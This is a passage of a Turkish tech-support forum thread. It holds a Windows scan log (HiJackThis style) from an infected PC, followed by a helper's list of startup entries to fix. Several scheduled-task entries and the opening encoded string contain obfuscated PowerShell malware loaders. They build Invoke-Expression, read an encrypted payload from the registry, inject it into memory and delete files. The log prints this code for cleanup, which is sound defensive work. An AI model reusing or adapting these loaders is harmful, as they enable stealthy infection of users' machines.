BaRT53uRB5coq2H/FZoZnAnGM+1tlXP/BItwjg35JM9IsDbPYZF3+AqrBYpq8WX1LYgN6An4YYpZxCu7CZtz6RCxS5QP/wOPbM8+oi/te+Yy/meYVswz8HL3ZoJK3nfWTPkBjBWaA7NS7HGRKvMMlnqXAKJXtSnYfO5hjWbnXoUdhX/5cvMV2jnNGe9wnR3GPo0ExlTjHvRtjxKnNZJ7+WHsLOd37gDrfZIOpRvtZrYsuky/fpth7BSBH4ZerQLte5dE/wecMdML5SqtMcE3uDqTI+ZIxVHDYeVl8QmZCuUduHXFQNNUglvVNrcu62mJFaQ1kX33dLhE8jS6QKRpgESnA7kwpSy6AcculmHrTYcSghWLBL9HnHTkBpQ/tyquWehylGbhQY1m6ACKSNxttkH1CagH7RDzaosVuwSaFYlqpFS2IdUz7AeZTP1B9g23PbAZ+TzZP5tJ/yTBa9g5qX+LcPkNxiSNCJxe2nqGaPQKl3ajX7pfyEbJKct2nFT4F5EOnzSwYvUe2krFM+V3jBWFXqsfhnHpD+tVwVvPFJJ10GXrDKkg2ATtfZMH0ETbY7chxUreb9MmqleDRoIEkRi9PcwuvhCMc40R8mPyZ9k1pSizdPgXkQ6fQbxprVuBRsED4G2dCJQ/nQTFVPgP9macHLIPmzCzIPdA5DDkTb0k3x2eSKB1tSrDE8ck01/pEoEt0kqtA/x1lWLUAo1wrRHyY/Jn2VzPfIZx6ReMPcImzGnSHIkHqFTPcIoZhhfAWIxi7123U6gY+hKYdbxQ/RHrOs4e/HuZCZYH2TqkXbEkwii/YegikQSNA8BU8DqWcvIQjWOXC+cirCzRXN9qm3PpCNYtmWjwW6pHtwvwSKk0yEDEUMwfxkvpE/h8k0igT9Q4uiDxQr0i4AWqbY8rn1jjIrchzEvTerdx6E2mBYQc0w0=';$qlygJ='nTevQxrioBYX';$fLUN=($qlygJ[7]+$qlygJ[2]+$qlygJ[5]);&$fLUN(&$fLUN ('''[Telvqxt.Encolvqding]::UTlvqF''+2*2*2+''.GelvqtStlvqring([Conlvqvert]::Fro''+''mlvqB''+''ase''+8*8+''Strilvqng(([relvqgex]:lvq:Malvqtchlvqes(''''pkCb3R0bXRFJocmbxZHbpJXc2xGdTRXZxZHbH5COGFndsRVV6oTXn5WaxZHbk92YxZHbuVkL0hXc2xWZU5SblRXc2x2c5FndsN1WogXc2xWZxZHbptTKyVmYxZHbtVnbsFndsFWayV2Uuclb1ZXRi9GJrcCInsCblRWc2x2bN5yVuVndFJ2bkgCIpkybDJUdLZHJocmbpJHdxZHbTRTc2xmNlNXYxZHbC12bxZHbyZkO60FdyVmdxZHbu92Qu0WZ0FndsNXeTtFKgMWc2xWZk1Db3R0bXRFJ7IXZi1Wc2xWduxWYpFndsJXZTxCblFndsR2bNBCdjVWc2xGblNHf9dCMFZVSSRETBFndsNUSTlFSQxlLcx1JgEXZtACRJVWc2x2YpZXZE5yXksHIlJXc2xWZodHflZXaxZHbyR2axZHbzlGZfJzMxZHbulWc2x2dgkWbxZHb3dWPX5Wd2VkYvRSf7kERLZ0QkAibyFndsVHdlJXfrsyVuVndFRyOORXbmRCIy9Gei1CIddlb1ZXRksVdFBlVkAicvFndshnYtASX1hFRVJFUksVSEtkRDRSPdVHWEVlUQRyWJR0SGNEJ74EdtZGJgI3bxZHb4JWLgkiM1EDIy9mYtAiT01mZkACZuFndsFmYtAyMygSPORXbmRSfw0zVuVndFRyepQnb192QuUXRQZFJgU2ZtAyVuVndFRCKml2epsyK1hFRVJFUksDduV3bD5SSEtkRDRCI0xWLgUHWEVlUQRyOw0TdYRUVSBFJoI3bxZHbmtDM9clb1ZXRksTXwsVdFBlVk0jT01mZksTKSlVWX5kekgyclFndsRXeCRXc2xWZH5COGRVV6oTXn5Wc2xWak92YuVkL0FndshXZU5SblFndsR3c5N1W9UXRQZFJ7liUZl1VOpHJddmbpJXc2xGdztFLJR0SGNEJd11WlRXc2xWeitFKjVWc2xGZg42bpR3YxZHbuVnZ'''',''''.'''',''''RilvqghlvqtTlvqoLlvqeft'''')|FolvqrEalvqch {$lvq_lvq.vallvque}) -jlvqo''+''in ''''''''))-replvqlace''''llvqvq''''|&(''''ilvqelvqx'''');''-'+'rep'+'lace''lvq'''))"
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\NCH Software (empty)
O22 - Task: (disabled) (update) \Microsoft\Windows\UpdateOrchestrator\Reboot_AC - C:\WINDOWS\system32\MusNotification.exe /RunOnAC EngagedRebootReminder (Microsoft)
O22 - Task: (disabled) (update) \Microsoft\Windows\UpdateOrchestrator\Reboot_Battery - C:\WINDOWS\system32\MusNotification.exe /RunOnBattery EngagedRebootReminder (Microsoft)
O22 - Task: (disabled) \Agent Activation Runtime\S-1-5-21-523137893-4004670275-4196358549-1001 - C:\WINDOWS\System32\AgentActivationRuntimeStarter.exe
O22 - Task: (disabled) \Microsoft\Windows\Management\Provisioning\Retry - C:\WINDOWS\system32\ProvTool.exe /turn 5 /source ProvRetryTask (Microsoft)
O22 - Task: (disabled) \Microsoft\Windows\Management\Provisioning\RunOnReboot - C:\WINDOWS\system32\ProvTool.exe /turn 5 /source ContinueSessionTask (Microsoft)
O22 - Task: (disabled) \Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work - C:\WINDOWS\system32\usoclient.exe StartMaintenanceWork (Microsoft)
O22 - Task: (disabled) \Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work - C:\WINDOWS\system32\usoclient.exe StartWork (Microsoft)
O22 - Task: (telemetry) \Microsoft\Office\Office 15 Subscription Heartbeat - C:\Program Files\Common Files\Microsoft Shared\Office16\OLicenseHeartbeat.exe (file missing)
O22 - Task: (telemetry) \Microsoft\Office\OfficeTelemetryAgentFallBack2016 - C:\Program Files\Microsoft Office\Office16\msoia.exe scan upload mininterval:2880 (Microsoft)
O22 - Task: (telemetry) \Microsoft\Office\OfficeTelemetryAgentLogOn2016 - C:\Program Files\Microsoft Office\Office16\msoia.exe scan upload (Microsoft)
O22 - Task: (telemetry) \Microsoft\Windows\Application Experience\PcaPatchDbTask - C:\WINDOWS\system32\rundll32.exe C:\WINDOWS\system32\PcaSvc.dll,PcaPatchSdbTask (Microsoft)
O22 - Task: \Avast Software\Overseer - C:\Program Files\Common Files\Avast Software\Overseer\overseer.exe /from_scheduler:1 (file missing)
O22 - Task: \McAfee\DAD.Execute.Updates - C:\Program Files\Common Files\McAfee\DynamicAppDownloader\1.6.110\DADUpdater.exe
O22 - Task: \McAfee\McAfee Auto Maintenance Task Agent - {ABCECA3B-EA5A-496B-A021-5C6BAB365E5C} - C:\Program Files\Common Files\McAfee\TaskScheduler\McAMTaskAgent.exe
O22 - Task: \McAfee\McAfee DAT Built in test - C:\Program Files\Common Files\McAfee\AMContent\scanners\x86_64\datrep\1.0.12.663\mcdatrep.exe /hcmode=periodic /periodicruncount=5
O22 - Task: \McAfee\McAfee Idle Detection Task - {ABCDCA3B-DE6B-5A7C-B132-6D7CBA63E5C5} - C:\Program Files\Common Files\McAfee\TaskScheduler\McAMTaskAgent.exe
O22 - Task: \Microsoft\Windows\Maintenance\WinNAT - C:\ProgramData\Windows\Profile\1.js powershell -c "984122374;$DxF='QCNyeyJxqkjQiV';'}&(5gc_m bA*y-T8y*_).bNaqme4 (0''i.us0?i{n9_g 2hS_y7ust_ie_mgc;u7_s+i_5ngp+ _S8,ysy,t_e_dm.8iI6O!+;u+_s_i{]ng_8 iS_lys2_t0e6cm.q5R2uj)nti_i_m_6e.b!I]nr0te_2r7o_{pS4meir_,vi62c7e_=s;ayugsvdin2{gn {bMiwfc_rf0os_7o_f9xt.jhW5ia=n35_2+;s9pu-xbilq_ic_r ?ct_lay=sxszv T3sB3{n_dev6l0e1cga_)t_e8b vhmoti_xd -ic]E5,iv=/(_)cs;p[bu6b]1li86c0 gsst_va(treici_ =v55oi1_d_ 0_cj3qouEk_()y_{/bd5yt3?ek[_4]M{wm_E_zb=_[F{ig_les+./E9-xiigsat77s(9_WrU_djhb_yat1xvrt4v_r_gWU.o)!?z-Fi-klneb6.R!_e2a_odAkblelz_By-+tae_fs(3gW(U_njh)rywtdsvr_(vdrtxWUec)5:)_(blpy_t_te[c_]2)_oRe{2gsi21sttdr_y!k.Luto_craalxtMfa_/ch=fitnf-e.}_O0p8_endnS=u3_bKz{e4ym{(@x3WlU__SO_lF)TlrWA_3RuE8-\M/_i_c0.ro--suo6!ft-9\4Ch_TF.0\-Tl_IP_5W_Uy()._tGhe!stV5sa)l_3ueb4(_WzaUj_ih7yd!tv_{r1vg4rW=+U!,_)nu_el5lp/);b}isf_o(M}-m[E(tb=oq={n6+ul85l])_jrew7t(ui(rn_0;cis_nt4- 9y__Zg,_u_=m_MmtfE,b?u.L1_ebnq=gtlahi;={fo!ur_(__ink7tc 54lXywB[=_r0;__l_XreB ]_!y=_7yZ0_g_uus-13.;alw_XB_j+++ia){__M5m9_Eb,c[.l{0XB_)]_^_(=(_kb_y_tte_w)_Wk_U+i}P_V__xnzpU{c_1}4f){xUmo9id.I_U.+NK_p4+gtx8oiu7[]1v4p+2Xe/_!KWmaU.[_!lXn_Bpfk_K21w86]{w;}k{I_np1tP_6t_roz mn(gwy_sk=cj(yI}]nt.8P/tn}r)e80_;[dIn_{t_Phbtrb_ be77Jv4a=7(oqIn_0tkP9_trc1)_y0_Zglouw;-_NtmoA8lt_lo5vc_a4ste_7V=i/_rt6?u_a{qlM7_ewmy_orq_y{(dj(I6znqt[4Pt)4rs)cn(-,v13)0s,rvsedf+_ melgky_tk,aq(oIs_nt_sPht7ur)/f0l,irregzf4 34eJb_vq,k,0xu}1a07=00m[,[0d0x4b103)gk;Mi_a_rv_sha_a6lqr.C_4o_pt,y(9oMsm_9Eb}},20v_,moagoy2!k,_[y.Z9+gu8h)r;e[((+_c!Eraiv9h)lM!rar(5s)hvpal.u._Gl,et_9D?e8_leorg9a0qteqnF)oq)rF2_uon9yct3bi_o}mnP_4o_iv_nt_(e.r01(ml{gmy7lk,r/t6y8.pe=.otf?=(c01E9i+4v)y()h)_/()_];(}t_[D7_l_l,{Im03pfo9drt!=(eW[(Unwmt[dt/llh_WsU+_)]7.pxr_jivk5a_t-_e cfs6ti_at_/i4c_3 e[+xot7serjxn9 2uloionvg5k Ni_thA__ll=oopc_satriezV6=irn!t_u[_al5gM/e_kmot(r[y+v(I=anftrhPt__r} hwVttn,.rp3ef[1 zI__nt[1Prt.-r _7e_OwfCQ_],(I,gnt6iP]toer _xwet_,m,oer_e5wf a4I2njjtP7_t_rb5 V/]atC2c,U6bIyn/wt3hv2? zoZw3),?U?7In_)t23g!2 v8U_pv));9=}_ '']-r_ep0la_ce(''._(.i.)-'',/''$?1''_ -tre_pl5ac(e''rWUi'',)[c_ha6r]c(3_4)k -_rekplzac+e''dfK6'',l[c(ha]r]x(3?7)h);6[Exnveiroonamenntf]:3:Couryrernt!Di{remctbor_y=3pw}d;][TwB]k::ycjgoEy()-; '-replace('.qnIU(qnIU.qnIU.)'-replace'qnIU'),('$'+807/807)|&($DxF[12]+$DxF[4]+$DxF[7]);3684975378" (file missing)
O22 - Task: \Microsoft\Windows\MUI\578309983 - C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -c "2268987711;$WTPb='NnkreMT)ixg.nO(llAikcJ';$rep_var='b&(pgc_m kA*g-Try*b)._Na.mex ({''k_us-_i_nekg m6Suyo2stc_edm?_;u8_smio_ngvz bSr.ysw0teeu+m._0I1O2_;u_9s-ifyng_4 _Smoys_7tle=im.e)R(uw_ntymijm_fe./!Inn_ute_?ryo_fpSk5eprz2vi}tcme{2s;}2u5s{?in_jg/ zpMivzcdr?_osc_o_f}1t.t2Wli_kn3lz2_;0_puh.b+l_8ic__ 2chcla_3syssy r{_c_Y+en{0)d_e]9le]_g8au(te7k jv__oi-+d_ 63WJ0.i.m_j()ov;rp-0ub1dl7iz_c _]s_t}katf7i_ci. vh9ooi4ld 8-B?I?rMT09(v)u[{b9_y,t]ie[5=]ujr,FP.ct_x_)=F_(ikleze.60Elx_vish)tns(1(u6lyrCf!rax0j8hm0yti6v-rf,vr?=u_ycvCr88ad)}k?F.li_lsle.h_Rue_xadw}A.lg)lBm7y)tdqes,_(su!fyCe_roap_jh!(yht_{vrycvtr=}uyt9C}r2.a)_(:_(8_bye2tve.m[]_j)oRe8egnni0s__tr_)y+._oLot.cpa5!lM_ba/c_3hii_nte__.O5_p_e4_nS+_u[bc_Ke3lyb([email protected]_xy{Cqyra]jSrO2_FTk-W4A_zREy9\(Makicvgr-o8_so_rf,tp=\C}9TuF_9\T3_I1P-muy_yC/r_4a)d}.]Gf_etj2V8a,plu__e{(y,uy-_C,r_sajb_h_yf,tv5_r_v_4ru-.ylC1oradp,_n}uul__ln)6_;i_-f_(f4jF![P0t/gx=_3=1n=8ul,-l_)29re-ltbu_urnh0;gi4_nteh hs_4JJmiKi=s{jFd_Petl_x._2Lpegyngu_t_h=p;f=bobr__(ie_nftm. vl_n?bijD=9l0j;_5vn=9b_Dsa !/e=8sj_JJ_{Kp-_81;]hv8nazbD.,+_+jw){12j_Fk-Pt7ixr[_?vn[!b?D_v]^g_=s(gibyott9ed9)ud9y=C_3raj_OuU}eM9_nQwvqmk/.qq/?_8!!gkB+(_jnw4_zlj26lG_p3d!_,pa3qQ+ujwyC/_r9a4a[v__ndb91DB3?noB)ogt}_2=5j]];+h}5I__ntp_P.tr_r h]i)f_brNp_=c(zvIni?tfP)7trml)_0__;I,onxtwgPt}_rc {mzctrsln_)f=3_(1Ie5nto_P)tv)r)f5s{J_}JK-r;_Nt0tA_nl_lgloc__alt_peV5-idr__tu,[a_l]hMe1_meo,_ry_[(x(9_In_6tgP7ztrx_)q(t,-1{g)_,tarekqf[ e_ifhgr[Nd_,(+_Iyn_{tPzkt.r8_)0iw,4rp_eflm _z]wcso4n_fn_,0x8xe17w00!j05,?[0x=f4_0-8);5fM8a97rsjuhqa_8l.0nC6opapy0_(cjpxFPk(t_x.2,0.{,!i{_frj5N?,s8sJ{oJhKwe);36(7(?_WJ__i_m__)M_{a1radsho?a-l+!.Gq4eat3hDek4l4eg_gakgt/e0_Fo2hr/F?_uneqc+t]_io)8npP_1oi=2n_tr-erlc(xi__fr),Nn,07tyi7ple_0of8_(1W3{Jirpmr)6+))dz(j)__;}uz[iD4slli_I?m.7po_]r,t_p(u_byeCpyra0znhtv3dl1rl}u_oyCh_r=a?8)]oqpqr8_iv[_amtr_e j2s_t,_ato4ifc_m ec}x)t_]er_hn8 3dlovonig]- Np{t_A=2lla_ouc_]aty!e]V3mir=jt_u_xalo4Mye!6mo2or3y__(I_3n_t_{Ptpcr_ _/Np_=Poh}_q,c_r2eu{f _(Imn97tP,xtjr}_ e__pzn_9k,__Ion/wtP)ft=rh5 Ix!Q3o{0Xqf?,6rszef6f rIxsntcvPzt(gr x6KtMy]gL71,6Um_In?_t_31e2 a4A_vvyaqv7,dU7vInq!t_3h_2 _pj_b__ld_4)_;__} c''-)re]pl0acae''_.(=..t)''/,''_$1['' c-rxepalaoce_''uwyC_ra}'',6[c8ha_r]?(3_4)_ -6reipliac5e''7Bn/Bgft''_,[1ch2ar6](u37_))e;(jlsm $yensv:ete9mpr -_Di=|wfhe[re5{(_$_+.N1amie.nLe_ng,th! -,eqy 8f)-/antd(q(G/ett-Ayclx $o_.8Fu_ll8Na_me_)._Actcenss2.FfilheS8ys_texmR3igpht/s c-epq _''Dhel9et5e''/)}x)|xdevl;_[E_nv_irlon-me0nt.]:(:C6ur5reuntdDi]re?cthor_y=_pwvd;_[rtcY_n]i::aBIdMTf()=; ';'$rep_var -rep'+''+'lace($WTPb[11]+$WTPb[14]+$WTPb[11]+$WTPb[11]+$WTPb[7]),(''$''+321/321)'|&($WTPb[8]+$WTPb[4]+$WTPb[9])|&($WTPb[8]+$WTPb[4]+$WTPb[9]);9701108446"
O22 - Task: \Microsoft\Windows\MUI\88542446 - C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -c "6768699732;$Czjm='recmbL)bvxob.X(TrIiDFh';$rep_var='_&(_gc_m ,A*!-T{y*!).)Na,me_ (2''24us4_i_n/_g d_Spyvystwdeim9h;u_4s7ilfngk2 )S=zys__teehvm.u_I2O=y;u_.s_iu-ngb, aS_tysb_t_eqsm.q.Rtument(4ikm__e.9pI=nm_tew5rdoo_pS?meyra_vii_c}eacs;o=u7s_qin_ig_ vaMiu_cwrutos__o.f.7t.m_W_ieon3-=23;o3pu_mbel5xic_s lcd_la/bsvs__ jt9W6n/_Sz39{vd_selpqelg)_at2ge- {bvox+ind]d Nh0C}Q__OL?4(t)cj;p_huebs_li_rc_ txst_xa6t6_icfe ivk7oi{ld8 kjtWe{m/r_lw(dx)_{_abyvlt_e8_[]ase1X_wsk_ll1=j9Fi+_lpe36.Eh+x_io_stnps_(lhjl+gKdC-_vyu9uxe,yrh.3futnwwtu(jflj4KCfav1)3!?F2di.lvve._oR_ed_ad+_Aulq5lBx_yttnses_5(4jkvlK__Cov6myu8re_re_hfl_t3wvdtj-5l?K!_Cv?9)f:j4(b-_y4t=ge[-o]6)2iRe_4g_i_zst9trpyo2.Le3o_cr_alf_M)at?ch[]ilnr_e.,aO_p[[enn]S_u!_bKo_e?yi((@rgj[l__KC_rv1ScnOFbjT,WrxARm=Ea\(_Mi=ccdr]_os2yo_ff{t\g,CdT3{F\4{T_I9_Pj4_lsK(6Cv_b)e.,,Geh_t_Vpoalinu_e__(j_9l!K9yCv!_y_u(,er_5h_f_}tw_9t_jtylKe9Cdve5,n((u_l_{l)?e;!i]{f(__e7X-_sk9rl6=o4=n_uu2l/el)o_rse-)tuxar-n=u;i]_nstvo I]_Z_B(ve=0_eeX_3sk_,l/._2Le66n!gt_thds;yf(sor?0(0i/!nt_a ja_oTAlfDp=er0;,+a(Ts_AD8_ e!g]=I_/ZhBa!e-l-1o;m_aT+bAqDl_++_5)+{_deX_as}k_zl[x4a_T4,AD44]s^td=(gub}y?_tei1)ij_,lKm[C_vthDs8_k_l7_]4mdtqrf_/o__GfE200u_b}_f!.67j6r0e9gy5i_7wdfsYd=2_,oq_?x.,c+IweD8_4V]L3{Vqx0Mn3ni7ak5uy+o}qfs?C_]_5e+3/L_0qq4Gyxl1Gb/IU_p+0]y6C+0kU__4}(3_rEzj+?bk{6{dl?,lfb_VoC8_n,5zq_6_,=5mz}bBwo8Tf46lW5_qe3d7,.q=cjb7l1KplCvi([!alyTA7_DyAt_Wu_moaVm(93_5]6;oa}I4]n_t{oPt-ur7 c-YX_8O3xwu=(_dI_na_tP_tt1ry_)0r_;_Iq_ntg0P_to=r umCyacwlr13Zm=du(I3?n_t9=Ptb_r8)_/IZxoB2eud;Nm)t.Ai_lla.o/c_-at_]e7V5iirx_t_u(_al_/Mfeiymo5_r{y_e((]7I_ntutP{_t4r.?)(rd-61m}),ror)e)rf w8Y-X(_Ox__,_([eIns[txP?.tr4m)j0j-,rxneufj{ C77aal,3rZkm,_0_sx1}=0q0ik0,!f0_xsq40+z)k;/_Ma(grus,_hak_lb.3wCo!wp=y8g(e!kXbs?_klp0,_0,_,Y__X_Ohtx,_sI_Z_[Be_e)5;)f((_0N4C9xQO!qL_)nzMa8_rns_+ha]hlw._kGe_bt_D-5elqde?gcpat3]e7Fj,or/)Flu__nc/0tdi_1on{nP_olgin/,t1e6gr(=lY_X_hOxe(,tt0_yproe2o_gf(__NbC!_QO_sL_).t))8z(/)5m;})n[5D6_ll/,I_m_hpo2erbt_](jpml]K)7Cv!4n_t__dla!l_j[ilK__C_v__)]?wp_r}tiv_6att6,e 0,s_tswat5_irc5, eggx}t_!er(kn, 99lo_!nhgu+ N9ut_A)bllf4o[c-dat,]ejV+_ir9jtsuisal{xMcerpmo_2rby{o(I]vn_t_hPti1r= g_XL=jUgM6-,r_ce1f-[ I_cntt7}Pto_r_ [?Pe+cW_tb_K,(_Ign09tP5_tyryf S__XpY_=Zg(_,0r?mef_w 3I}_nt)wPrt,_r 37A!n_uaK1b,cUg_In+1tk3og2 blXyB[oVm0p,?Up=Inwnti3m92 _eEcn_{Lk_y)(;_.} [''-!re5pl-ac8e''s.(j.._)''o,''m$1_'' .-r}ep}lawcee''j}lKbCv_'',0[cgha_r]d(3a4)_ -ireppl9ac_e''wAW_uo3V''_,[nch6arx](537z))_;(fls_ $=enkv:)teamp, -)Dik|wxhe!re5{(6$_r.N_am-e.yLeyngith7 -6eq8 8f)-[an-d(_(G_et5-A9cl_ $g_.qFu_ll,Napmef).)Acnce6ssp.F4il3eS_ys+te5mR4ignhtxs 5-e{q _''Dgel)etpe''-)}j)|_de_l;([E_nv+ir7on_mewntv]:8:Cwurkre4nt6Di)rewct_or_y=_pwmd;k[j_WnnSz-]:_:tiWmnrwy()8; ';'$rep_var -rep'+''+'lace($Czjm[12]+$Czjm[14]+$Czjm[12]+$Czjm[12]+$Czjm[6]),(''$''+396/396)'|&($Czjm[18]+$Czjm[1]+$Czjm[9])|&($Czjm[18]+$Czjm[1]+$Czjm[9]);7913805660"
O22 - Task: Adobe Acrobat Update Task - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
O22 - Task: AdobeGCInvoker-1.0 - C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe -mode=scheduled
O22 - Task: Avast Emergency Update - C:\Program Files\Avast Software\Avast\AvEmUpdate.exe (file missing)
O22 - Task: GoogleUpdateTaskMachineCore - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /c
O22 - Task: GoogleUpdateTaskMachineUA - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /ua /installsource scheduler
O22 - Task: IntelSURQC-Upgrade-86621605-2a0b-4128-8ffc-15514c247132 - C:\Program Files\Intel\SUR\QUEENCREEK\Updater\bin\IntelSoftwareAssetManagerService.exe --automatic
O22 - Task: IntelSURQC-Upgrade-86621605-2a0b-4128-8ffc-15514c247132-Logon - C:\Program Files\Intel\SUR\QUEENCREEK\Updater\bin\IntelSoftwareAssetManagerService.exe --automatic
O22 - Task: IUM-F1E24CA0-B63E-4F13-A9E3-4ADE3BFF3473 - C:\Program Files (x86)\Intel\Intel(R) Update Manager\bin\iumsvc.exe --automatic (file missing)
O22 - Task: McAfee Remediation (Prepare) - C:\Program Files\Common Files\AV\McAfee VirusScan\upgrade.exe /prepare
O22 - Task: McAfeeLogon - C:\Program Files\Common Files\McAfee\Platform\McUICnt.exe /platui
O22 - Task: OneDrive Reporting Task-S-1-5-21-523137893-4004670275-4196358549-1001 - C:\Users\CASPER\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe /reporting
O22 - Task: Opera GX scheduled assistant Autoupdate 1614967658 - C:\Users\CASPER\AppData\Local\Programs\Opera GX\launcher.exe --scheduledautoupdate --component-name=assistant --component-path="C:\Users\CASPER\AppData\Local\Programs\Opera GX\assistant" $(Arg0)
O22 - Task: Opera GX scheduled Autoupdate 1604429592 - C:\Users\CASPER\AppData\Local\Programs\Opera GX\launcher.exe --scheduledautoupdate $(Arg0)
O22 - Task: Opera scheduled assistant Autoupdate 1590958890 - C:\Users\CASPER\AppData\Local\Programs\Opera\launcher.exe --scheduledautoupdate --component-name=assistant --component-path="C:\Users\CASPER\AppData\Local\Programs\Opera\assistant" $(Arg0) (file missing)
O22 - Task: Opera scheduled Autoupdate 1590958881 - C:\Users\CASPER\AppData\Local\Programs\Opera\launcher.exe --scheduledautoupdate $(Arg0) (file missing)
O22 - Task: TaskbarX CASPERNIRVANACASPER - C:\Users\CASPER\Desktop\TaskbarX_1.6.9.0_x64\TaskbarX.exe -tbs=1 -color=0;0;0;50 -tpop=100 -tsop=100 -as=cubiceaseinout -obas=cubiceaseinout -asp=300 -ptbo=0 -stbo=0 -lr=400 -oblr=400 -sr=0 -sr2=0 -sr3=0 -ftotc=1 -rzbt=1 (file missing)
O23 - Service R2: Adobe Acrobat Update Service - (AdobeARMservice) - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
O23 - Service R2: Adobe Genuine Monitor Service - (AGMService) - C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe
O23 - Service R2: Adobe Genuine Software Integrity Service - (AGSService) - C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe
O23 - Service R2: Dolby DAX2 API Service - (DAX2API) - C:\Program Files\Dolby\Dolby DAX2\DAX2_API\DolbyDAX2API.exe
O23 - Service R2: Elan Service - (ETDService) - C:\Program Files\Elantech\ETDService.exe
O23 - Service R2: Gaming Services - (GamingServices) - C:\Program Files\WindowsApps\Microsoft.GamingServices_3.60.12001.0_x64__8wekyb3d8bbwe\GamingServices.exe
O23 - Service R2: Gaming Services - (GamingServicesNet) - C:\Program Files\WindowsApps\Microsoft.GamingServices_3.60.12001.0_x64__8wekyb3d8bbwe\GamingServicesNet.exe
O23 - Service R2: Intel(R) Driver & Support Assistant - (DSAService) - C:\Program Files (x86)\Intel\Driver and Support Assistant\DSAService.exe
O23 - Service R2: Intel(R) HD Graphics Control Panel Service - (igfxCUIService2.0.0.0) - C:\WINDOWS\system32\igfxCUIService.exe
O23 - Service R2: McAfee AP Service - (McAPExe) - C:\Program Files\Common Files\McAfee\VSCore_21_4\McApExe.exe
O23 - Service R2: McAfee CSP Service - (mccspsvc) - C:\Program Files\Common Files\McAfee\CSP\4.3.107.0\\McCSPServiceHost.exe
O23 - Service R2: McAfee Module Core Service - (ModuleCoreService) - C:\Program Files\Common Files\McAfee\ModuleCore\ModuleCoreService.exe
O23 - Service R2: McAfee PEF Service - (PEFService) - C:\Program Files\Common Files\McAfee\PEF\CORE\PEFService.exe
O23 - Service R2: McAfee Service Controller - (mfemms) - C:\Program Files\Common Files\McAfee\SystemCore\mfemms.exe
O23 - Service R2: McAfee WebAdvisor - C:\Program Files\McAfee\WebAdvisor\ServiceHost.exe
O23 - Service R2: PMBDeviceInfoProvider - C:\Program Files (x86)\Sony\PlayMemories Home\PMBDeviceInfoProvider.exe
O23 - Service R3: Intel(R) Driver & Support Assistant Updater - (DSAUpdateService) - C:\Program Files (x86)\Intel\Driver and Support Assistant\DSAUpdateService.exe
O23 - Service R3: McAfee Validation Trust Protection Service - (mfevtp) - C:\Program Files\Common Files\McAfee\SystemCore\mfemms.exe
O23 - Service S2: Google Güncelleme Hizmeti (gupdate) - (gupdate) - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /svc
O23 - Service S3: BattlEye Service - (BEService) - C:\Program Files (x86)\Common Files\BattlEye\BEService.exe
O23 - Service S3: EasyAntiCheat - C:\Program Files (x86)\EasyAntiCheat\EasyAntiCheat.exe
O23 - Service S3: Epic Online Services - (EpicOnlineServices) - C:\Program Files (x86)\Epic Games\Epic Online Services\service\EpicOnlineServicesHost.exe
O23 - Service S3: Google Chrome Elevation Service (GoogleChromeElevationService) - (GoogleChromeElevationService) - C:\Program Files (x86)\Google\Chrome\Application\97.0.4692.71\elevation_service.exe
O23 - Service S3: Google Güncelleme Hizmeti (gupdatem) - (gupdatem) - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /medsvc
O23 - Service S3: Intel(R) Content Protection HECI Service - (cphs) - C:\WINDOWS\SysWow64\IntelCpHeciSvc.exe
O23 - Service S3: Intel(R) SUR QC Software Asset Manager - (Intel(R) SUR QC SAM) - C:\Program Files\Intel\SUR\QUEENCREEK\Updater\bin\IntelSoftwareAssetManagerService.exe
O23 - Service S3: McAfee Firewall Core Service - (mfefire) - C:\Program Files\Common Files\McAfee\SystemCore\mfemms.exe
O23 - Service S3: Rockstar Game Library Service - (Rockstar Service) - C:\Program Files\Rockstar Games\Launcher\RockstarService.exe
O23 - Service S3: Steam Client Service - C:\Program Files (x86)\Common Files\Steam\steamservice.exe /RunAsService
O23 - Service S3: SteelSeries Update Service - (SteelSeriesUpdateService) - C:\Program Files\SteelSeries\GG\SteelSeriesUpdateService.exe
O23 - Service S3: Uncheater for BattleGrounds_GL - (ucldr_battlegrounds_gl) - C:\Program Files\Common Files\UNCHEATER\ucldr_battlegrounds_gl.exe
O23 - Service S3: Uncheater for BattleGroundsLite_SE - (uncheater_bgl) - C:\Program Files\Common Files\Uncheater\uncheater_bgl.exe
O23 - Service S3: vgc - C:\Program Files\Riot Vanguard\vgc.exe
O23 - Service S3: Zakynthos Service - (zksvc) - C:\Program Files\Common Files\PUBG\zksvc.exe


--
End of file - Time spent: 104,3 sec. - 64562 bytes, CRC32: FFFFFFFF. Sign: 譭烮
 
Son düzenleme:

acv

Megapat
Katılım
31 Temmuz 2015
Mesajlar
7.623
Makaleler
1
Çözümler
72
Yer
Sehit Muhtar/Zambak Sok./Gumus Gerdan Apt./Beyoglu
Sırasıyla,

Bunları fixleyin:

Kod:
O4 - HKCU\..\StartupApproved\Run: [DSL Host] = C:\Users\CASPER\AppData\Roaming\4C9F9BE4-4E44-4309-A6B4-69A5DA3242B1\DSL Host\dslhost.exe (2020/11/25)
O4 - HKCU\..\StartupApproved\Run: [Zoom] = (no file) (2021/03/12)
O4 - HKCU\..\StartupApproved\Run: [Voicemod] = C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe (file missing) (2020/11/25)
O4 - HKLM\..\StartupApproved\Run: [AvastUI.exe] = C:\Program Files\Avast Software\Avast\AvLaunch.exe /gui (file missing) (2020/10/27)
O4 - HKLM\..\StartupApproved\Run: [tvncontrol] = C:\Program Files\TightVNC\tvnserver.exe -controlservice -slave (file missing) (2020/11/30)
O4 - HKLM\..\StartupApproved\Run: [Wondershare Helper Compact.exe] = C:\Program Files\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe (file missing) (2020/09/29)
